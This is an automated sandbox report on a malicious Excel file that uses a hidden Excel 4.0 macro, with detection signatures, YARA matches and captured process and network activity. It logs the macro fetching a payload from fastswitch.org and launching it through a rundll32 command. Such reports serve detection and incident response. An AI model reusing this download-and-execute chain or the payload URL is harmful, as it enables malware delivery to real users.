Loading ...

Play interactive tourEdit tour

Analysis Report document-1429954472.xls

Overview

General Information

Sample Name:document-1429954472.xls
Analysis ID:384830
MD5:de9de1ff91dd0501f1405ce027fb5941
SHA1:826804c571db7b1c892160c8c4c05c2d5d015d63
SHA256:26acece82b024fc2b5306a52189db24a8742c11cc9ebbc84ab6a5dca8672bc0c
Tags:SilentBuilderxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5948 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6240 cmdline: rundll32 ..\iojhsfgv.dvers,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1429954472.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4c2a2:$s1: Excel
  • 0x4d2f4:$s1: Excel
  • 0x38f2:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1429954472.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1429954472.xlsReversingLabs: Detection: 47%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 110MB
    Source: global trafficDNS query: name: fastswitch.org
    Source: global trafficTCP traffic: 192.168.2.3:49719 -> 47.244.191.15:80
    Source: global trafficTCP traffic: 192.168.2.3:49719 -> 47.244.191.15:80
    Source: global trafficHTTP traffic detected: GET /ds/0702.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fastswitch.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0702.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fastswitch.orgConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: fastswitch.org
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 20:15:42 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.31X-Powered-By: PHP/5.6.31Content-Length: 79Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 37 30 32 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ds/0702.gif was not found on this server.
    Source: document-1429954472.xlsString found in binary or memory: http://fastswitch.org/ds/0702.gif
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.aadrm.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.cortana.ai
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.office.net
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.onedrive.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://augloop.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cdn.entity.
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://clients.config.office.net/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://config.edge.skype.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cortana.ai
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cortana.ai/api
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://cr.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dev.cortana.ai
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://devnull.onenote.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://directory.services.
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://graph.windows.net
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://graph.windows.net/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://lifecycle.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://login.windows.local
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://management.azure.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://management.azure.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://messaging.office.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ncus.contentsync.
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://officeapps.live.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://onedrive.live.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://outlook.office.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://outlook.office365.com/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://settings.outlook.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://staging.cortana.ai
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://tasks.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://wus2.contentsync.
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 8Screenshot OCR: Enable Content F122 " i 7c v' J& [El - O X 9+ Share ::::'" " Ct P Sort & Find & & Clear" Mer -
    Source: Screenshot number: 12Screenshot OCR: Enable Content X F122 " i 7c v' J& " ^ DocuSign ' """""""""""""""' EI Ready I I!!] I i 100% O
    Source: Screenshot number: 16Screenshot OCR: Enable Content X F313 " i 7c v' J& v =. DocuSign q m Type here to search Ki E a a g xg *
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1429954472.xlsInitial sample: EXEC
    Source: document-1429954472.xlsOLE indicator, VBA macros: true
    Source: document-1429954472.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal72.expl.evad.winXLS@3/6@1/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{27F20E34-9E0C-49F2-A83D-CA403369A1D7} - OProcSessId.datJump to behavior
    Source: document-1429954472.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
    Source: document-1429954472.xlsReversingLabs: Detection: 47%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
